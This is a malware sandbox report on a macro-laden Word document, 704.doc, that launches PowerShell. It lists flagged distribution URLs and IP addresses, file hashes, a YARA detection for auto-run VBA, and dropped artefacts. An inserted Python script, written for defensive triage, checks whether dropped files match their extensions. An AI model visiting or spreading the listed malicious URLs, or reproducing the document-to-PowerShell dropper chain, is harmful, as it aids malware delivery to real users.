• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/526268/sample/704.doc

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

Time      Type             Description
13:23:00  API Interceptor  34x Sleep call for process: powershell.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

Match           Associated Sample Name / URL                                    Detection  Context
60.248.112.145  http://pipspeakhypnotherapy.co.uk/administrator/zp472n-7r-63/  malicious  dhartimata.com/tmp/diyl8uu13-9zf1bm-55570559/
                http://www.clinicasprevenga.com/administrator/ksS/              malicious  dhartimata.com/tmp/diyl8uu13-9zf1bm-55570559/

                                                                                                                                    Domains

                                                                                                                                    No context

                                                                                                                                    ASN

                                                                                                                                    Conditions de paiement.exeGet hashmaliciousBrowse
                                                                                                                                    • 166.62.10.136
                                                                                                                                    PROJECT NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 148.72.214.23
                                                                                                                                    QUOTE REQUEST FOB_Medlited Trading Co.exeGet hashmaliciousBrowse
                                                                                                                                    • 72.167.84.16
                                                                                                                                    SecuriteInfo.com.Variant.Bulz.885187.6822.exeGet hashmaliciousBrowse
                                                                                                                                    • 107.180.56.180
                                                                                                                                    BANK DETAILS.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 148.72.214.23
                                                                                                                                    Doc00000883746473.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 148.72.214.23
                                                                                                                                    2YnVgiNH23Get hashmaliciousBrowse
                                                                                                                                    • 107.180.2.16
                                                                                                                                    ncMG8wu5IGGet hashmaliciousBrowse
                                                                                                                                    • 107.180.12.15

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\ProgramData\646848703.dll
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):7616
                                                                                                                                    Entropy (8bit):5.643493512858842
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJqZ:QJvVGaRF8I8e
                                                                                                                                    MD5:25CB0101745D210670A8C622B713D25E
                                                                                                                                    SHA1:6FB348D14036D1E68C4AE68DEFB3A3B53B0E7283
                                                                                                                                    SHA-256:94C62A22BC584EFECEA77DF528342119056CA59D3D6F8CB39F02C9EDC160C14C
                                                                                                                                    SHA-512:9F4AD3E6FBDF229BF71B5F6F228C98663E689AAAF71FA0357875F16AD33AB76FCEAB938D6E281752259D4395F35614235141BDBF233836B308E0F8A476769CDC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
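The entry above deserves a second look. The file is named 646848703.dll and was written to C:\ProgramData by powershell.exe, but the report's own File Type and Preview fields show it is not a DLL at all: it is a hosting provider's "Account Suspended" HTML page. The Malicious: false verdict is right for the bytes on disk, yet the disagreement between extension and content is itself the useful signal, since it shows the downloader stage ran and that the distribution URL it fetched was already dead. The script below is an added example, not part of this report or of any sandbox tooling. It checks whether a dropped file's content agrees with what its extension promises (an MZ/PE header for .dll/.exe and similar, otherwise whatever the magic bytes say) and flags the mismatch. The "Account Suspended" page, the minimal PE stub and the path names it is run against are constructed inline for illustration and are not the analysed sample's actual bytes.

```python
"""Flag dropped files whose content does not match their extension.

Added example (not from the sandbox report). Sample inputs are constructed
below; they are not the bytes of the analysed file.
"""
import ntpath
import struct

# Extensions that promise a PE image (the Windows loader expects an MZ/PE header).
PE_EXTENSIONS = {".dll", ".exe", ".ocx", ".sys", ".scr"}


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with 'MZ' and e_lfanew points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the PE header
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def looks_like_html(data: bytes) -> bool:
    """True if the (whitespace-stripped) start of data is an HTML document."""
    head = data.lstrip()[:32].lower()
    return head.startswith(b"<!doctype html") or head.startswith(b"<html")


def classify(data: bytes) -> str:
    """Coarse content type from magic bytes: 'pe', 'html' or 'unknown'."""
    if looks_like_pe(data):
        return "pe"
    if looks_like_html(data):
        return "html"
    return "unknown"


def triage_dropped_file(path: str, data: bytes) -> dict:
    """Compare what the extension promises with what the bytes actually are."""
    ext = ntpath.splitext(path)[1].lower()  # ntpath handles Windows paths on any OS
    expected = "pe" if ext in PE_EXTENSIONS else None
    actual = classify(data)
    mismatch = expected is not None and actual != expected
    return {"path": path, "expected": expected, "actual": actual, "mismatch": mismatch}


def flag_mismatches(dropped: dict) -> list:
    """Return the paths of every dropped file whose content contradicts its extension."""
    return [p for p, data in dropped.items() if triage_dropped_file(p, data)["mismatch"]]


# --- constructed sample data (not the real artefacts) -----------------------
# A hosting provider's suspension page, like the one the report shows saved as a .dll.
ACCOUNT_SUSPENDED_HTML = (
    b"<!DOCTYPE html>\n<html>\n<head>\n"
    b'<meta http-equiv="Cache-control" content="no-cache">\n'
    b"<title>Account Suspended</title>\n</head>\n<body>Account Suspended</body>\n</html>\n"
)


def build_minimal_pe() -> bytes:
    """A 64-byte DOS header whose e_lfanew points at a PE signature plus an empty COFF header.

    Enough to satisfy the magic check; it is not a loadable image.
    """
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + bytes(20)


# Hypothetical drop list: the first path mirrors the report, the others are made up.
CONSTRUCTED_DROPS = {
    r"C:\ProgramData\646848703.dll": ACCOUNT_SUSPENDED_HTML,   # written by powershell.exe in the report
    r"C:\ProgramData\example_real.dll": build_minimal_pe(),    # hypothetical well-formed PE
    r"C:\Users\user\AppData\Local\Temp\page.html": ACCOUNT_SUSPENDED_HTML,
}

if __name__ == "__main__":
    for p in flag_mismatches(CONSTRUCTED_DROPS):
        r = triage_dropped_file(p, CONSTRUCTED_DROPS[p])
        print(f"MISMATCH {p}: extension says {r['expected']}, content is {r['actual']}")
```

Run over the constructed drop list, only the .dll that is really HTML is reported. In practice the same check belongs in the post-processing of any sandbox run: a PE-named file that fails the MZ/PE test tells you the stage that wrote it completed, and the content (here a suspension page) tells you why the next stage never appeared.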
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):140193
                                                                                                                                    Entropy (8bit):5.357932616669791
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:bcQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:xuQ9DQW+zYXfH
                                                                                                                                    MD5:08DCA7A4FCD6393E7C011CA63B152E0C
                                                                                                                                    SHA1:3C94D8DA46A4F629BEB5AAC702B1E65746A2F020
                                                                                                                                    SHA-256:1DC17B81DE4BB45441D0C257D754359BC55F2B37D170385E63BFD05BAD5F5E6B
                                                                                                                                    SHA-512:7F8B475098391D6475E842155226E855396FBCFC3D38A49B6851E14E8DB67639596C55D56033D5E94C784ED3D72423F09A03FE476F24CAAF3AF19BA8716496E7
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-22T12:22:35">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\665C8B7A.png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):121507
                                                                                                                                    Entropy (8bit):7.978393301250379
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
                                                                                                                                    MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
                                                                                                                                    SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
                                                                                                                                    SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
                                                                                                                                    SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):4.808788708175036
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:IMV2gfCYtBMnkyXpua8HVRV2gfCYtBMnkyXpua8H:M6N7MkVhHY6N7MkVhH
                                                                                                                                    MD5:194AF1A94B7E75A87C5BE6F1F9453857
                                                                                                                                    SHA1:F8EC8975336DD690A8CF44D1D64C917F13305E2F
                                                                                                                                    SHA-256:596C8EBE3A92F62DFA347202C79910F848A418DE4B2371B213A0004086957D9C
                                                                                                                                    SHA-512:07970DF399585AFF83C04279B843C9FE5CA5ED6482A6B69B33E5677929207323A05ECD51AC619FDB1991C27C3D72A2FCA56D1FA972DDF19A5280BC3C01806C62
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{35810410-5FD3-47F2-B08A-1DE17B8BA882}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1024
                                                                                                                                    Entropy (8bit):0.05390218305374581
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{62016A81-8420-4F16-89A1-1259E0199215}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1536
                                                                                                                                    Entropy (8bit):3.1478370528780375
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:HfCemjup6uKTHuJPkTQXaHINvhSBxD+aoF:TKTOJuymfO
                                                                                                                                    MD5:582FA24D082E9486E72A1B9681CDF97B
                                                                                                                                    SHA1:CB23EE4B0A2D6188A7C39562DB5B4AA8A9C4FBB9
                                                                                                                                    SHA-256:F857A260E9DC18D6B5A51207FAC4F1A8A985840E8132CCFB324DEAC36DF67145
                                                                                                                                    SHA-512:48BDDEC49E6DDE25F4BC3D28C2A8D33E7382022226DF0A836044EB1A3E69FA5A46712AE301BF478C23F686297EB5E9BD9AE2C7A29F03628706CE69BA9E08EDCA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ../... ... . ... ... ..... . ... ... . ..... . ....... ... ..... ......... . . ... . ... ... . . ............. . ....... ... ............... ... ......... ......... . . ....... . ..... . . ... ... ... . .....................................................................................................................................................................................................................................................................................................................................@...H...\...f...h...|................................................................................................................................................................................................................................................................................................................................................L.......\. ............gd|b..........).Y...gd..T.............gd|H...............L.......\. ............gd..T.......
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{A2B54B36-922B-4491-AD33-70B4A37C30C5}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2
                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:X:X
                                                                                                                                    MD5:32649384730B2D61C9E79D46DE589115
                                                                                                                                    SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
                                                                                                                                    SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
                                                                                                                                    SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ..
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20548
                                                                                                                                    Entropy (8bit):5.605905752002901
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:7t9Dbv0nDPuVpOdGb0PggYSB+CIdcUsulpEIiT9oEuqpQ1mvrfyzLH:ODJkiG4bIuUsulmtVoyKH
                                                                                                                                    MD5:78E4DBADB142BC1436A0C746C1026BFB
                                                                                                                                    SHA1:C67241D96C86EE2736F2A68FB31911E487C2A352
                                                                                                                                    SHA-256:E6293121B4430038B0549D9549DF356B30CA3B8137429459BB595E5780EB60D1
                                                                                                                                    SHA-512:77524D441A9358FA74A158F3ECC93539CBAA8FBD5E9DD1764164746A82FDD73008C2FD24E7E5974951FBA704951DA7173E08401BA9CA1F93138CC1DB7B8486E7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: @...e................................................@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].G.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):152056
                                                                                                                                    Entropy (8bit):4.414325807338861
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:fmmHLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3ow:f1g8WpFpKKHHedydFeo+oQLUlPow
                                                                                                                                    MD5:DE65EB542715B95DD0EAAF56CA9AA27F
                                                                                                                                    SHA1:A52571968D70CD4141A5F746A6447F400090A870
                                                                                                                                    SHA-256:F02615DFC224B4DBB09B2E6ED96E97E3BDF711F838F94997D5BB8474F09FF15E
                                                                                                                                    SHA-512:D52CF17A2BC15729E6C9FBB4366A97C1A345678111393657C35C07DA17D71D5C6FE685071044244580E0E265B673787A6F1D12998FB3311F4DBBE1A9461EDA31
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: (binary data, not reproduced)
                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xa3wtq.jvy.ps1
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: 1
                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrskvuat.dwv.psm1
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: 1
                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):51200
                                                                                                                                    Entropy (8bit):4.991998039588056
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:QgFs7kSlE3K6PPDkyXZAQhQwIykFYeUrQ7S8iVdVdW:NGkSlE3hPAGhQj5cc
                                                                                                                                    MD5:3DC228918F3FC1CCEEC6300CBC293775
                                                                                                                                    SHA1:7713AF2621B648F8B28F804D7CC877F63DFE63E4
                                                                                                                                    SHA-256:1FEC6E5BBE68AC32E0C43C66ABB995F20D4941372815444176171EAF3469AE3E
                                                                                                                                    SHA-512:E8484A62DED0564A1251C7299997CF4F58FEAE1CFF2D0B73C3B85CB4AEE68BC67B7395048BC1F57A572D6940729E5ED3A5E8064FD648DAC7EAA123DE69A5B5C5
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP, Author: Florian Roth
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    Preview: (binary data, not reproduced)
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\704.LNK
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:51 2020, mtime=Mon Nov 22 11:22:37 2021, atime=Mon Nov 22 11:22:33 2021, length=136531, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1014
                                                                                                                                    Entropy (8bit):4.708319672411773
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:8cgxnKRUUduCH2POPK4VPAw+WcoJOjAwg/D04vs5D03S3v44t2Y+xIBjKZm:8cgQ/PjAGyAhbrs5DWwo7aB6m
                                                                                                                                    MD5:EDAC1A423CC725FEB03469581A4A8D42
                                                                                                                                    SHA1:EC089C3D3C1118D8BCDAA3CD491DF3396BFFEF35
                                                                                                                                    SHA-256:88C92CD9853CF1A97D7F7215336DED94323EEDF40EBEFD5DAB05A8382884F579
                                                                                                                                    SHA-512:953010D56D52AF576BC3788403425BFFFA55EAC4A88E763144720B294628C148F305DC4D97C840F073D416FC1470E33EEA5344B13F4807F3A7305FF6E92DED90
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: (binary shortcut data, not reproduced)
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):57
                                                                                                                                    Entropy (8bit):4.440640076685947
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:bDuMJl+VomX1SVtBVov:bCJaV9y
                                                                                                                                    MD5:2B1A3D4E9531BB7AAAEEE91097C6E6C8
                                                                                                                                    SHA1:CDCB8BB8DF9FDC8AE6C9B4E7B3FA485B8075C74B
                                                                                                                                    SHA-256:7C5B1F305E5CDABE223B67B449800F306C63D8B354CA4A21F1C8C20E909EC8E1
                                                                                                                                    SHA-512:B2ED8A04808A83A548F91A0CFA5B3D830A05EB52D6B4F436B02D3ADDF1A020DBE04252F19E778E706827A16CBB7E3ECED7BBD8E82E69096A1328E2BEFA478374
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: [folders]..Templates.LNK=0..704.LNK=0..[doc]..704.LNK=0..
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):162
                                                                                                                                    Entropy (8bit):2.324669529927172
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Rl/ZdnOZDlBlqbMtlt/7l2mtX/r:RtZlO9cbMtB22
                                                                                                                                    MD5:B02AB585D974C49883C056100EC22388
                                                                                                                                    SHA1:52D512FC1DD9F8D0B2D1AE11B3256D43DB0DDC02
                                                                                                                                    SHA-256:D280C9DA4FD90A5400B1361E16E2EE7F8ABE6179793D370D302C0BEF2772C8B7
                                                                                                                                    SHA-512:76ED98F3971774E2BD820E7F35DBD97C301E4035577E564163ACADB5A16BFDBBB3F9E95059142F0D70D82568212E507065B9A159CC79F4A8BDA52D0DEB1FDF21
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .pratesh................................................p.r.a.t.e.s.h.............-;..........H.......6C..E.0.....E<..........................+....=..............
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20
                                                                                                                                    Entropy (8bit):2.8954618442383215
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                    MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                    SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                    SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                    SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ..p.r.a.t.e.s.h.....
                                                                                                                                    C:\Users\user\Desktop\~$704.doc
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):162
                                                                                                                                    Entropy (8bit):2.324669529927172
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Rl/ZdnOZDlBlqbMtlt/7l2mtX/r:RtZlO9cbMtB22
                                                                                                                                    MD5:B02AB585D974C49883C056100EC22388
                                                                                                                                    SHA1:52D512FC1DD9F8D0B2D1AE11B3256D43DB0DDC02
                                                                                                                                    SHA-256:D280C9DA4FD90A5400B1361E16E2EE7F8ABE6179793D370D302C0BEF2772C8B7
                                                                                                                                    SHA-512:76ED98F3971774E2BD820E7F35DBD97C301E4035577E564163ACADB5A16BFDBBB3F9E95059142F0D70D82568212E507065B9A159CC79F4A8BDA52D0DEB1FDF21
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: .pratesh................................................p.r.a.t.e.s.h.............-;..........H.......6C..E.0.....E<..........................+....=..............
                                                                                                                                    C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9243
                                                                                                                                    Entropy (8bit):5.508993704744811
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:BZVj3NgmxORFqDo1ZvmxORBLS7Znj3NgmxORFqDo1ZGhS8BS2bTzXBS2bTzXBS22:7x/x1zxO1oQoQoobbxOd8jS8jSgjL
                                                                                                                                    MD5:56F8A52E8A08459615EF28950B50087A
